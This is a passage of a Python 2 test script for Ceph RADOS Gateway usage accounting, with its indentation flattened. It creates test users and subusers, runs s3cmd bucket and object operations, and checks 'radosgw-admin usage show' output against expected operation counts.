time.sleep(30)
def run(self):
rsult1 = result2 = True
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
os.chdir(py_dir)
if result1 == result2 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3}}}}}
expect_dict4 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == True:
print "testcase10 %s" % (ok_display("OK"))
else:
print "testcase10 %s" % (fail_display("FAIL"))
else:
print "testcase10 %s" % (fail_display("FAIL"))
class TestCase11(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg ls s3://test1')
exec_command('s3cmd -c user1.s3cfg ls s3://test2')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg ls s3://test1')
exec_command('s3cmd -c subuser1.s3cfg ls s3://test2')
time.sleep(30)
def run(self):
rsult1 = result2 = True
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
os.chdir(py_dir)
if result1 == result2 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2}}}}}
expect_dict4 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == True:
print "testcase11 %s" % (ok_display("OK"))
else:
print "testcase11 %s" % (fail_display("FAIL"))
else:
print "testcase11 %s" % (fail_display("FAIL"))
class TestCase12(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg del s3://test2/user1.s3cfg')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg del s3://test1/subuser1.s3cfg')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subuser1.s3cfg del s3://test2/subuser2.s3cfg')
time.sleep(30)
def op5(self):
exec_command('s3cmd -c subuser1.s3cfg rb s3://test2')
time.sleep(30)
def clean(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
exec_command('rm 10*.txt')
def run(self):
rsult1 = result2 = True
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
os.chdir(py_dir)
if result1 == result2 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == True:
self.op3()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == True:
self.op4()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == True:
self.op5()
expect_dict9 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 2, "successful_ops": 2},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict10 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
os.chdir(py_dir)
if result1 == result2 == True:
print "testcase12 %s" % (ok_display("OK"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
self.clean()
class TestCase13(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin user create --uid=user2 --access-key=user2 --secret-key=user2 --display-name="user2"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user2 --subuser=subu01 --access=full --access-key=subu01 --secret-key=subu01')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user2 --subuser=subu02 --access=full --access-key=subu02 --secret-key=subu02')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c user1.s3cfg put user1.s3cfg s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c user2.s3cfg mb s3://test01')
exec_command('s3cmd -c user2.s3cfg put user2.s3cfg s3://test01')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser1.s3cfg mb s3://test2')
exec_command('s3cmd -c subuser1.s3cfg put subuser1.s3cfg s3://test2')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subu01.s3cfg mb s3://test02')
exec_command('s3cmd -c subu01.s3cfg put subu01.s3cfg s3://test02')
time.sleep(30)
def run(self):
result1 = result2 = result3 = result4 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 0}
expect_dict3 = {"entries_size": 0}
expect_dict4 = {"entries_size": 0}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op2()
expect_dict5 = expect_dict1
expect_dict6 = expect_dict2
expect_dict7 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict8 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict7)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op3()
expect_dict9 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict10 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict11 = expect_dict7
expect_dict12 = expect_dict8
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict11)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op4()
expect_dict13 = expect_dict9
expect_dict14 = expect_dict10
expect_dict15 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict16 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict15)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict16)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
print "testcase13 %s" % (ok_display("OK"))
else:
print "testcase13 %s" % (fail_display("FAIL"))
else:
print "testcase13 %s" % (fail_display("FAIL"))
else:
print "testcase13 %s" % (fail_display("FAIL"))
else:
print "testcase13 %s" % (fail_display("FAIL"))
class TestCase14(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg get s3://test1/user1.s3cfg 14-1.txt')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg get s3://test2/subuser1.s3cfg 14-2.txt')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user2.s3cfg get s3://test01/user2.s3cfg 14-3.txt')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subu01.s3cfg get s3://test02/subu01.s3cfg 14-4.txt')
time.sleep(30)
def run(self):
result1 = result2 = result3 = result4 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op2()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict7 = expect_dict3
expect_dict8 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict7)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op3()
expect_dict9 = expect_dict5
expect_dict10 = expect_dict6
expect_dict11 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict12 = expect_dict8
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict11)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op4()
expect_dict13 = expect_dict9
expect_dict14 = expect_dict10
expect_dict15 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict16 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict15)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict16)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
print "testcase14 %s" % (ok_display("OK"))
else:
print "testcase14 %s" % (fail_display("FAIL"))
else:
print "testcase14 %s" % (fail_display("FAIL"))
else:
print "testcase14 %s" % (fail_display("FAIL"))
else:
print "testcase14 %s" % (fail_display("FAIL"))
class TestCase15(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg ls s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg ls s3://test2')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user2.s3cfg ls s3://test01')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subu01.s3cfg ls s3://test02')
time.sleep(30)
def run(self):
result1 = result2 = result3 = result4 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op2()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict7 = expect_dict3
expect_dict8 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict7)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op3()
expect_dict9 = expect_dict5
expect_dict10 = expect_dict6
expect_dict11 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict12 = expect_dict8
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict11)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op4()
expect_dict13 = expect_dict9
expect_dict14 = expect_dict10
expect_dict15 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict16 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict15)
